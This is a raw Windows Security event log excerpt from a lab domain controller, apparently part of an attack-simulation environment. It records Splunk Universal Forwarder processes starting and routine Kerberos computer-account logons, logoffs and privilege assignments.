Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1680
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263807
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1af0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263806
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1518
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:28:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263810
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766646
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:28:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263809
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766646
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51549
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:28:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263808
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766646
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263821
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766ABA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263820
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BA8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263819
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BF0
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263818
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766C62
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51554
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263817
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766C62
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263816
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766BF0
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51553
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263815
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BF0
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263814
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766BA8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263813
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766BA8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263812
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x766ABA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51552
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:29:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263811
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766ABA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:29:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263822
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1660
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263824
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a88
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263823
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263825
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263826
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263828
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x408
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263827
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:29:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263829
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x766C62
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:29:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263832
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x76A521
